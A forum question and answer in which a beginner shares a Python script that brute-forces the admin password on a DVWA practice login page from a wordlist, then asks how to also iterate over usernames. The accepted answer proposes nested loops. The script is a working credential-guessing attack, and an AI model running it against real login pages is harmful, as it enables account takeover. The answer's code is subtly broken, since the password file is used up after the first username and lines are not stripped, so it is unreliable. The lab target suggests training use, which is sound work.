# serious noob needs assistance PYTHON

Tags: python-3.x

As part of an online course I've wrote a programme that can guess passwords for an online login page. However im trying to write is so it also guesses the username. I'm very happy with what I've done so far but it can be better. I don't expect anybody to re-write it for me, but if you could have a look over it and point me in the right direction. essentially what i would like is for it to continue using a words list and to check 1 user name to all passwords. for example;

WORDLIST
abc
abb
acc

first use abc and check abc, abb, acc
secondly use abb and check abc, abb, acc
lastly use acc and check abc, abb, acc

Any help would be greatly appreciated. I am very new to programming. here is my code;

```
#!/usr/bin/env python

import requests


target_url = "http://192.168.1.51/dvwa/login.php"
data_dict = {"username": "admin", "password": "", "Login": "submit"}


with open("/root/Documents/hotmail.txt", "r") as wordlist:
    count = 0
    for line in wordlist:
        word = line.strip()
        data_dict["password"] = word
        response = requests.post(target_url, data=data_dict)
        count +=1
        print("\r[+] ATTEMPTS MADE = " + str(count), end="")
        if b"Login failed" not in response.content:
            print("\n[+] PASSWORD FOUND ---- >>>> " + word)
            exit()


print("[-] PASSWORD NOT FOUND")
```

Answer (score 0, accepted):

You can just nest loops. For example:

```
with open("/root/Documents/usernames.txt", "r") as usernames:
  with open("/root/Documents/passwords.txt", "r") as passwords:
    count = 0
    for username in usernames:
      for password in passwords:
        ...
        data_dict["username"] = username
        data_dict["password"] = password
        ...
```